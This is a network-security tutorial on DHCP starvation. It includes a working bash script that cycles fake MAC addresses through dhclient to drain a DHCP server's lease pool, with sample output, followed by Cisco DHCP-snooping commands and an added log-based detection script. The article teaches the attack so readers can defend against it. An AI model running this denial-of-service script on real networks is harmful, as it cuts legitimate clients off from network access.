DHCP starvation - quick and dirty

The DHCP starvation attack is quite simple to implement and therefore quite dangerous, especially if it escalates into a DHCP spoofing attack. It can be used to implement a Denial of Service (DoS) attack against the DHCP server on the local network, thus preventing legitimate clients from accessing network resources. In this article we will demonstrate how this attack can be carried out, and then go through the steps necessary to mitigate it on Cisco equipment with the help of DHCP snooping.

Scenario

The idea behind DHCP starvation is to create dummy leases for all IPs in the DHCP range. This effectively causes a DoS: new network clients that request an IP address from the DHCP server will not be served, because there are no free IP addresses left to lease. The effect of the attack lasts until the dummy leases expire, which depends on the lease time configured on the DHCP server.

This attack can be automatically performed with yersinia, but for demonstration purposes we will use a quick and dirty script that only uses macchanger and dhclient.

macchanger is a great tool that does just what its name says – it changes the MAC address of your network interface. dhclient, on the other hand, is the standard tool, present in almost any Linux distribution, that is used for leasing an IP address from a DHCP server and renewing the lease when necessary.

To the point – the following bash script demonstrates step by step the way that such an attack works:

[email protected]:~# cat starve.sh
#!/bin/bash

while true; do
   # kill all running dhcp clients - just in case
   killall dhclient
   rm -f /var/run/dhclient.pid

   # bring down the interface
   ifconfig eth0 down

   # change the MAC address of the interface and print the new MAC address
   macchanger -a eth0 2>&1 | grep Faked

   # bring the interface up
   ifconfig eth0 up

   # make a new DHCP lease
   dhclient eth0 2>&1 | grep DHCPACK
done
[email protected]:~#

The results from running this script, besides causing a DoS attack (for which you will be personally responsible unless you are authorized to perform penetration testing of the network resources involved), will look much like this:

[email protected]:~# ./starve.sh
dhclient: no process killed
Faked MAC:   00:0e:7b:63:fc:18 (Toshiba)
DHCPACK of 192.168.123.207 from 192.168.123.1
Faked MAC:   00:30:63:ec:24:fb (Santera Systems, Inc.)
DHCPACK of 192.168.123.208 from 192.168.123.1
Faked MAC:   00:0b:30:df:69:28 (Beijing Gongye Science & Technology Co.,ltd)
Faked MAC:   00:0d:08:d3:d9:ad (Abovecable, Inc.)
Faked MAC:   00:05:20:49:1f:5a (Smartronix, Inc.)^C
[email protected]:~#

When you stop seeing DHCPACKs, this means that you have depleted the available leases of the DHCP server.

Mitigation

When IP allocation is done through DHCP servers, DHCP snooping can be configured on the switches to only allow clients with specific IP/MAC addresses to have access to the network.

To enable DHCP snooping on a Cisco IOS switch, use the following commands:

! To enable DHCP Snooping globally, enter:
switch(config)# ip dhcp snooping
! To enable DHCP Snooping for specific VLANs enter:
switch(config)# ip dhcp snooping vlan <vlan_id> {,<vlan_id>}
! To set the interface to trusted state, which will allow passing DHCP replies enter:
switch(config-if)# ip dhcp snooping trust
! To set a rate limit for DHCP Snooping enter:
switch(config-if)# ip dhcp snooping limit rate <rate>
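
On the DHCP server, the attack described above shows up as a burst of leases to never-before-seen MAC addresses, followed by pool exhaustion. As a complement to DHCP snooping, the following added example (not part of the original article) flags both in the server log; it assumes ISC dhcpd-style syslog lines, and the sample log, function names and thresholds are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original article). Assumes ISC dhcpd-style
# syslog lines; the patterns need adjusting for other DHCP servers.
# Constructed sample log: two ordinary clients, then a burst of never-seen
# MACs on one interface that ends with the pool exhausted.
sample_log() {
cat <<'EOF'
Mar  3 09:58:12 gw dhcpd[812]: DHCPACK on 192.168.123.50 to 3c:97:0e:11:22:33 via eth1
Mar  3 10:00:02 gw dhcpd[812]: DHCPACK on 192.168.123.51 to 3c:97:0e:44:55:66 via eth1
Mar  3 10:15:01 gw dhcpd[812]: DHCPACK on 192.168.123.207 to 00:0e:7b:63:fc:18 via eth1
Mar  3 10:15:09 gw dhcpd[812]: DHCPACK on 192.168.123.208 to 00:30:63:ec:24:fb via eth1
Mar  3 10:15:17 gw dhcpd[812]: DHCPACK on 192.168.123.209 to 00:0b:30:df:69:28 via eth1
Mar  3 10:15:25 gw dhcpd[812]: DHCPACK on 192.168.123.210 to 00:0d:08:d3:d9:ad via eth1
Mar  3 10:15:33 gw dhcpd[812]: DHCPDISCOVER from 00:05:20:49:1f:5a via eth1: network 192.168.123.0/24: no free leases
EOF
}

# detect_starvation WINDOW_SECONDS MAX_NEW_MACS < logfile
# Alerts when more than MAX_NEW_MACS previously unseen MAC addresses get a
# lease on one interface within WINDOW_SECONDS, and when the pool runs dry.
detect_starvation() {
    awk -v window="$1" -v limit="$2" '
    # Syslog HH:MM:SS to seconds since midnight (split multi-day logs first).
    function secs(t,   p) { split(t, p, ":"); return p[1]*3600 + p[2]*60 + p[3] }

    / DHCPACK on / {
        mac = ""
        for (i = 1; i < NF; i++) if ($i == "to") mac = tolower($(i + 1))
        iface = $NF; now = secs($3)
        if (mac == "" || ((iface, mac) in known)) next   # renewals are not new
        known[iface, mac] = 1
        n = ++total[iface]; first[iface, n] = now
        # Slide the window: forget first-seen times that are too old.
        while (now - first[iface, head[iface] + 1] >= window) head[iface]++
        recent = n - head[iface]
        if (recent > limit && !alerted[iface]++)
            printf "ALERT new-mac-burst iface=%s count=%d window=%ds time=%s\n", iface, recent, window, $3
    }

    /no free leases/ {
        net = "unknown"
        for (i = 1; i < NF; i++) if ($i == "network") net = $(i + 1)
        sub(/:$/, "", net)
        if (!dry[net]++)
            printf "ALERT pool-exhausted network=%s time=%s\n", net, $3
    }'
}
sample_log | detect_starvation 60 3
```

The window and threshold should be tuned to the normal rate at which new devices join the segment.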
